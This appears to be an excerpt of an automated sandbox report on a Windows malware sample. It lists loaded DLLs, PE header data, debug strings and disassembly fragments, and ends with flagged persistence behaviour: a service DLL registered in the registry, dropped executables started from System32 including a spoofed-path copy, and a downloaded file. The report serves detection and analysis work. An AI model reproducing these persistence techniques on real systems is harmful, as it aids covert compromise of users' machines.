Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libpq.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libssl-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libintl-9.dll
Source: C:\Windows\System32\svchost.exeSection loaded: secur32.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libcrypto-3-x64.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libwinpthread-1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: libiconv-2.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: libcurl.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: zlib1.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\console_zero.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Ld0f3NDosJ.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Ld0f3NDosJ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Ld0f3NDosJ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613047508.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362305807.00007FFD93B8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363092235.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612916762.00007FFDA553F000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: ucrtbased.pdb source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 00000018.00000003.2501497770.0000025D7065E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 00000028.00000002.2603343739.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 00000028.00000000.2502474138.00007FF68C622000.00000002.00000001.01000000.00000009.sdmp
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Ld0f3NDosJ.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA55BB470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency,53_2_00007FFDA55BB470
Source: Ld0f3NDosJ.exeStatic PE information: section name: .fptable
Source: hardsvcupdt[1].exe.3.drStatic PE information: section name: .fptable
Source: pyld64.exe.3.drStatic PE information: section name: .fptable
Source: usvcinsta64.exe.14.drStatic PE information: section name: .fptable
Source: printui.dll.24.drStatic PE information: section name: .fptable
Source: libwinpthread-1.dll.40.drStatic PE information: section name: .xdata
Source: console_zero.exe.40.drStatic PE information: section name: .fptable
Source: vcruntime140d.dll.40.drStatic PE information: section name: _RDATA
Source: libiconv-2.dll.40.drStatic PE information: section name: .xdata
Source: libiconv-2.dll.40.drStatic PE information: section name: /4
Source: libiconv-2.dll.40.drStatic PE information: section name: /19
Source: libiconv-2.dll.40.drStatic PE information: section name: /31
Source: libiconv-2.dll.40.drStatic PE information: section name: /45
Source: libiconv-2.dll.40.drStatic PE information: section name: /57
Source: libiconv-2.dll.40.drStatic PE information: section name: /70
Source: libiconv-2.dll.40.drStatic PE information: section name: /81
Source: libiconv-2.dll.40.drStatic PE information: section name: /92
Source: libintl-9.dll.40.drStatic PE information: section name: .xdata
Source: libintl-9.dll.40.drStatic PE information: section name: /4
Source: libintl-9.dll.40.drStatic PE information: section name: /19
Source: libintl-9.dll.40.drStatic PE information: section name: /31
Source: libintl-9.dll.40.drStatic PE information: section name: /45
Source: libintl-9.dll.40.drStatic PE information: section name: /57
Source: libintl-9.dll.40.drStatic PE information: section name: /70
Source: libintl-9.dll.40.drStatic PE information: section name: /81
Source: libintl-9.dll.40.drStatic PE information: section name: /92
Source: x543664.dat.40.drStatic PE information: section name: .fptable
Source: C:\Windows\System32\svchost.exeCode function: 53_2_649487B2 push r11; ret 53_2_649487ED
Source: C:\Windows\System32\svchost.exeCode function: 53_2_660224A8 push rax; retf 53_2_660224B1
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829984B push 00000000h; retf 53_2_68299850
Source: C:\Windows\System32\svchost.exeCode function: 53_2_682970AC push rax; iretd 53_2_682970AD
Source: C:\Windows\System32\svchost.exeCode function: 53_2_682951B2 push rdx; retn 0000h53_2_682951B3
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829998B push 00000000h; ret 53_2_68299990
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829999B push 00000000h; iretd 53_2_682999A0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829AA73 push 00000000h; ret 53_2_6829AA78
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829ABBB push 00000000h; retf 53_2_6829ABC0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829ABB3 push 00000000h; ret 53_2_6829ABB8
Source: C:\Windows\System32\svchost.exeCode function: 53_2_6829A7AB push 00000000h; iretd 53_2_6829A7B0
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2B8 push 050001C2h; retn 0001h53_2_00007FFDA333C2C5
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2C8 push 680001C2h; retn 0001h53_2_00007FFDA333C2CD
Source: C:\Windows\System32\svchost.exeCode function: 53_2_00007FFDA333C2D0 push 680001C2h; retn 0001h53_2_00007FFDA333C2D5

Persistence and Installation Behavior

barindex
Creates a Windows Service pointing to an executable in C:\Windows
Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x543664\Parameters ServiceDll C:\Windows\System32\x543664.dat
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\usvcinsta64.exeJump to behavior
Source: C:\Windows\System32\cmd.exeExecutable created and started: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exe
Source: C:\Users\user\Desktop\Ld0f3NDosJ.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\hardsvcupdt[1].exeJump to dropped file
